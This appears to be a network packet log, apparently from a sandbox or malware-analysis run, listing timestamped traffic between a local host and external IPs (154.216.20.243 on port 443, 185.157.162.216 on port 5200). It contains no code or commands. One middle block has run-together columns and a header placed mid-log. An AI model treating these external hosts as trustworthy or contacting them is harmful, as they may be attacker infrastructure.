Dec 9, 2024 07:37:33.085591078 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.155916929 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.155932903 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.156008959 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.156025887 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.156064987 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.162040949 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.162056923 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.162101030 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.162113905 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.162131071 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.162151098 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.247596025 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.247612000 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.247708082 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.247730970 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.247775078 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.253721952 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.253762007 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.253823996 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.253834963 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.253880024 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.259793043 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.259809017 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.259880066 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.259887934 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.259927034 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.265170097 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.265186071 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.265242100 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.265258074 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.265296936 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.271688938 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.271706104 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.271765947 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.271781921 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.271819115 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.343329906 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.343348026 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.343403101 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.343422890 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.343461990 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.348236084 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.348257065 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.348293066 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.348306894 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.348366022 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.348409891 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.362471104 CET  49740        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.362508059 CET  443          49740      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.362561941 CET  49740        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.363679886 CET  49740        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.363691092 CET  443          49740      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.435421944 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.435436010 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.435503006 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.435523033 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.435560942 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.440216064 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.440231085 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.440284014 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.440296888 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.440337896 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.446325064 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.446338892 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.446383953 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.446397066 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.446425915 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.446440935 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.452487946 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.452502966 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.452560902 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.452577114 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.452620029 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.457833052 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.457848072 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.457886934 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.457901001 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.457926035 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.457952976 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.464345932 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.464360952 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.464421034 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.464435101 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.464473963 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.535717964 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.535736084 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.535975933 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.536004066 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.536050081 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.540760994 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.540787935 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.540869951 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.540880919 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.540921926 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.627769947 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.627791882 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.627989054 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.628001928 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.628046036 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.632554054 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.632570028 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.632627010 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.632636070 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.632678032 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.638623953 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.638639927 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.638699055 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.638706923 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.638747931 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.644857883 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.644874096 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.644928932 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.644937992 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.644973993 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.650222063 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.650238991 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.650312901 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.650321007 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.650367975 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.656702042 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.656717062 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.656781912 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.656790018 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.656829119 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.709886074 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:33.710760117 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:33.727873087 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.727890968 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.727957010 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.727974892 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.728018045 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.732906103 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.732923031 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.732984066 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.732990980 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.733031034 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.820054054 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.820071936 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.820161104 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.820172071 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.820214033 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.824800968 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.824817896 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.824879885 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.824887037 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.824924946 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.830070972 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:33.830127954 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:33.830974102 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.830993891 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.831047058 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.831054926 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.831094027 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.837049961 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.837066889 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.837116957 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.837125063 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.837167025 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.842385054 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.842401981 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.842458963 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.842467070 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.842504978 CET  49738        443        192.168.2.4      154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.848912001 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.848927021 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.848985910 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.848992109 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.849026918 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.920337915 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.920353889 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.920418024 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.920440912 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.920454025 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.920605898 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.925254107 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.925268888 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.925335884 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.925348997 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:33.925384998 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:33.949359894 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.012238026 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.012254000 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.012346029 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.012363911 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.012406111 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.017674923 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.017712116 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.017772913 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.017784119 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.017822981 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.023051977 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.023071051 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.023133993 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.023148060 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.023191929 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.029206991 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.029226065 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.029278040 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.029287100 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.029310942 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.029329062 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.035264969 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.035279989 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.035358906 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.035367012 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.035408020 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.041048050 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.041068077 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.041127920 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.041136026 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.041177034 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.112638950 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.112656116 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.112742901 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.112755060 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.112799883 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.117455006 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.117471933 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.117527008 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.117533922 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.117573023 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.204480886 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.204500914 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.204588890 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.204601049 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.204638958 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.209546089 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.209563971 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.209624052 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.209630966 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.209667921 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.215711117 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.215727091 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.215792894 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.215801001 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.215837955 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.221899986 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.221918106 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.221971035 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.221981049 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.222021103 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.227195024 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.227210045 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.227272987 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.227281094 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.227332115 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.233654976 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.233669996 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.233741045 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.233748913 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.233788013 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.304688931 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.304707050 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.304789066 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.304801941 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.304840088 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.309767008 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.309783936 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.309820890 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.309828997 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.309849024 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.309871912 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.396698952 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.396714926 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.396791935 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.396810055 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.396848917 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.402192116 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.402206898 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.402256966 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.402265072 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.402302027 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.408354998 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.408370018 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.408420086 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.408427954 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.408463955 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.413760900 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.413775921 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.413831949 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.413841009 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.413877010 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.419995070 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.420011044 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.420064926 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.420073032 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.420104027 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.425620079 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.425640106 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.425678015 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.425685883 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.425704002 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.425724983 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.511048079 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.511065960 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.511117935 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.511141062 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.511164904 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.511177063 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.516693115 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.516709089 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.516778946 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.516788006 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.516827106 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.589361906 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.589385986 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.589498043 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.589524984 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.589567900 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.594893932 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.594911098 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.594993114 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.595001936 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.595035076 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.600326061 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.600339890 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.600411892 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.600420952 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.600486994 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.606506109 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.606520891 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:34.606570005 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:34.606579065 CET44349738154.216.20.243192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 9, 2024 07:37:34.606615067 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.612509012 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.612524033 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.612579107 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.612587929 CET  443          49738      154.216.20.243   192.168.2.4
